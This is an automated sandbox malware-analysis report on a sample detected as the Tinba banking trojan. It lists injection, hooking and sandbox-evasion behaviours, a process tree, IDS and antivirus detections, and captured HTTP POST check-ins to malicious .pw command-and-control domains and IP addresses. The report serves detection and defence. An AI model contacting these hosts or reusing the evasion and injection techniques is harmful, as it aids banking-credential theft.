
Windows Analysis Report
java.exe

Overview

General Information

Sample name: java.exe
Analysis ID: 1378065
MD5: b471d5f706df69a4a28664d7e335a9da
SHA1: 995a757d4562d9f4e8231f359b4b78db2de1c1f0
SHA256: 223534841809356aa7c94f86e8b0f4d6b4ce317b8225b419b27a5ba320ab0b81
Tags: exe, tinba

Detection

Tinba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Tinba Banker
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Exploit detected, runtime environment starts unknown processes
Hooks files or directories query functions (used to hide files and directories)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • java.exe (PID: 7340 cmdline: C:\Users\user\Desktop\java.exe MD5: B471D5F706DF69A4A28664D7E335A9DA)
    • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winver.exe (PID: 7396 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • bin.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe" MD5: CC18A03FCBC9DCF9DF31B64689EB3E55)
          • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bin.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe" MD5: CC18A03FCBC9DCF9DF31B64689EB3E55)
          • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 3832 cmdline: ctfmon.exe MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
      • RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
      • RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
      • TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
      • RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
      • WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
      • RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)
      • UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
      • svchost.exe (PID: 5428 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dllhost.exe (PID: 1440 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • cscript.exe (PID: 5956 cmdline: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus MD5: CB601B41D4C8074BE8A84AED564A94DC)
      • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • backgroundTaskHost.exe (PID: 2504 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
      • RuntimeBroker.exe (PID: 5820 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 404 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • BjCNEZCMnwLaEEzWr.exe (PID: 3288 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 1104 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 1608 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 5356 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 5324 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 4584 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 3140 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 648 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 2124 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
Name: Tinba
Description: F-Secure notes that TinyBanker, or short Tinba, is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe. If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and, if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc. in the legitimate-looking page. Tinba may also display socially-engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba
No configs have been found
Source: Process Memory Space: java.exe PID: 7340 | Rule: JoeSecurity_Tinba | Description: Yara detected Tinba Banker | Author: Joe Security
Source: Process Memory Space: winver.exe PID: 7396 | Rule: JoeSecurity_Tinba | Description: Yara detected Tinba Banker | Author: Joe Security
Source: Process Memory Space: explorer.exe PID: 2580 | Rule: JoeSecurity_Tinba | Description: Yara detected Tinba Banker | Author: Joe Security
Source: Process Memory Space: sihost.exe PID: 3420 | Rule: JoeSecurity_Tinba | Description: Yara detected Tinba Banker | Author: Joe Security
Source: Process Memory Space: svchost.exe PID: 3456 | Rule: JoeSecurity_Tinba | Description: Yara detected Tinba Banker | Author: Joe Security
            No Sigma rule has matched
Timestamp: 01/20/24-20:41:48.295231 | Source: 192.168.2.4:49742 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2020418 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:48.295231 | Source: 192.168.2.4:49742 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2830613 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:42.359145 | Source: 192.168.2.4:49738 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2830613 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:42.359145 | Source: 192.168.2.4:49738 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2024659 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:49.827227 | Source: 192.168.2.4:49743 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2830613 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:42.359145 | Source: 192.168.2.4:49738 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2020418 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:43.842659 | Source: 192.168.2.4:49739 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2020418 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:43.842659 | Source: 192.168.2.4:49739 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2024659 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:46.905610 | Source: 192.168.2.4:49741 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2024659 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:33.804089 | Source: 192.168.2.4:49735 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2020418 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:45.528112 | Source: 192.168.2.4:49740 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2020418 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:33.804089 | Source: 192.168.2.4:49735 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2024659 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:39.347423 | Source: 192.168.2.4:49736 | Destination: 178.62.201.34:80 | Protocol: TCP | SID: 2024659 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:40.938841 | Source: 192.168.2.4:49737 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2020418 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:45.528112 | Source: 192.168.2.4:49740 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2024659 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:49.827227 | Source: 192.168.2.4:49743 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2024659 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:46.905610 | Source: 192.168.2.4:49741 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2020418 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:49.827227 | Source: 192.168.2.4:49743 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2020418 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:48.295231 | Source: 192.168.2.4:49742 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2024659 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:43.842659 | Source: 192.168.2.4:49739 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2830613 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:39.347423 | Source: 192.168.2.4:49736 | Destination: 178.62.201.34:80 | Protocol: TCP | SID: 2020418 | Classtype: A Network Trojan was detected
Timestamp: 01/20/24-20:41:40.938841 | Source: 192.168.2.4:49737 | Destination: 216.218.185.162:80 | Protocol: TCP | SID: 2024659 | Classtype: A Network Trojan was detected


            AV Detection

Source: java.exe | Avira: detected
Source: http://spaines.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://uyhgqunqkxnx.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://evbsdqvgmpph.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://cmnsgscccrej.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://mfueeimvyrsp.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://gfnlmtcolrrb.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://vcklmnnejwxx.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://fkmmvfeonnyh.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Avira: detection malicious, Label: HEUR/AGEN.1322420
Source: vcklmnnejwxx.pw | Virustotal: Detection: 14%
Source: uyhgqunqkxnx.pw | Virustotal: Detection: 13%
Source: mfueeimvyrsp.pw | Virustotal: Detection: 17%
Source: cmnsgscccrej.pw | Virustotal: Detection: 13%
Source: utmyhnffxpcj.pw | Virustotal: Detection: 17%
Source: spaines.pw | Virustotal: Detection: 15%
Source: fkmmvfeonnyh.pw | Virustotal: Detection: 17%
Source: gfnlmtcolrrb.pw | Virustotal: Detection: 13%
Source: evbsdqvgmpph.pw | Virustotal: Detection: 16%
Source: http://uyhgqunqkxnx.pw/EiDQjNbWEQ/ | Virustotal: Detection: 13%
Source: http://cmnsgscccrej.pw/EiDQjNbWEQ/ | Virustotal: Detection: 17%
Source: http://evbsdqvgmpph.pw/EiDQjNbWEQ/ | Virustotal: Detection: 15%
Source: http://mfueeimvyrsp.pw/EiDQjNbWEQ/ | Virustotal: Detection: 9%
Source: http://spaines.pw/EiDQjNbWEQ/ | Virustotal: Detection: 11%
Source: http://gfnlmtcolrrb.pw/EiDQjNbWEQ/ | Virustotal: Detection: 15%
Source: http://fkmmvfeonnyh.pw/EiDQjNbWEQ/ | Virustotal: Detection: 16%
Source: http://vcklmnnejwxx.pw/EiDQjNbWEQ/ | Virustotal: Detection: 11%
Source: java.exe | ReversingLabs: Detection: 89%
Source: java.exe | Virustotal: Detection: 89%
Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe | Joe Sandbox ML: detected
Source: java.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_03392DCF CryptAcquireContextA,CryptImportPublicKeyInfo,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,2_2_03392DCF
Source: java.exe | Binary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAldMoUs9Ytg4Z6u+LBejj XsQpi94U2CbOGCF5DieMHxzcr5nhleioQixxAah9IEXJgzZ8Ag69xjMADnuKMumV xOFw6SbeOhRGrT/al5Rv/X56bsKPBBn5UAR5xhzUielXM77Z8R0oKVOKfXYDXdMq hx6FPFOOnV4/H7u3zf0sUbHXjbJEamXSjWRd0O
Source: java.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown | HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49730 version: TLS 1.2

            Software Vulnerabilities

Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\System32\conhost.exe

            Networking

Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49735 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49735 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49736 -> 178.62.201.34:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49736 -> 178.62.201.34:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49737 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49737 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49738 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49738 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49738 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49739 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49739 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49739 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49740 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49740 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49741 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49741 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49742 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49742 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49742 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49743 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49743 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49743 -> 216.218.185.162:80
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: spaines.pw | Content-Length: 157 | Data Raw: 71 72 15 f5 52 7a 15 f5 1a ea 4f 98 77 70 14 d6 41 42 25 c5 41 42 25 c5 | Data Ascii: qrRzOwpAB%AB%
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: uyhgqunqkxnx.pw | Content-Length: 157 | Data Raw: 17 36 54 98 31 3e 54 98 7c ae 0e f5 11 34 55 bb 27 06 64 a8 27 06 64 a8 | Data Ascii: 6T1>T|4U'd'd
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: vcklmnnejwxx.pw | Content-Length: 157 | Data Raw: 46 b7 57 5a 61 bf 57 5a 2d 2f 0d 37 40 b5 56 79 76 87 67 6a 76 87 67 6a | Data Ascii: FWZaWZ-/7@Vyvgjvgj
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: cmnsgscccrej.pw | Content-Length: 157 | Data Raw: 8a 6a 6e 07 a2 62 6e 07 e1 f2 34 6a 8c 68 6f 24 ba 5a 5e 37 ba 5a 5e 37 | Data Ascii: jnbn4jho$Z^7Z^7
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: evbsdqvgmpph.pw | Content-Length: 157 | Data Raw: c9 d0 3a ba e1 d8 3a ba a2 48 60 d7 cf d2 3b 99 f9 e0 0a 8a f9 e0 0a 8a | Data Ascii: ::H`;
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: mfueeimvyrsp.pw | Content-Length: 157 | Data Raw: 4a 7b a7 87 63 73 a7 87 21 e3 fd ea 4c 79 a6 a4 7a 4b 97 b7 7a 4b 97 b7 | Data Ascii: J{cs!LyzKzK
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: utmyhnffxpcj.pw | Content-Length: 157 | Data Raw: ce a6 09 2f e4 ae 09 2f a5 3e 53 42 c8 a4 08 0c fe 96 39 1f fe 96 39 1f | Data Ascii: //>SB99
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: fkmmvfeonnyh.pw | Content-Length: 157 | Data Raw: fc 54 53 d8 d6 5c 53 d8 97 cc 09 b5 fa 56 52 fb cc 64 63 e8 cc 64 63 e8 | Data Ascii: TS\SVRdcdc
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: gfnlmtcolrrb.pw | Content-Length: 157 | Data Raw: b3 59 ba 92 98 51 ba 92 d8 c1 e0 ff b5 5b bb b1 83 69 8a a2 83 69 8a a2 | Data Ascii: YQ[ii
Source: Joe Sandbox View | IP Address: 216.218.185.162
Source: Joe Sandbox View | ASN Name: HURRICANEUS
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A4109000CC6X-BM-CBT: 1696420817X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 60X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109000CC6X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-tX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2237Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; 
SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_03392F88 send,send,recv,closesocket,2_2_03392F88
Source: unknown | DNS traffic detected: queries for: spaines.pw
            Source: explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: svchost.exe, 00000006.00000002.2961228667.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718586388.0000019E29FBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
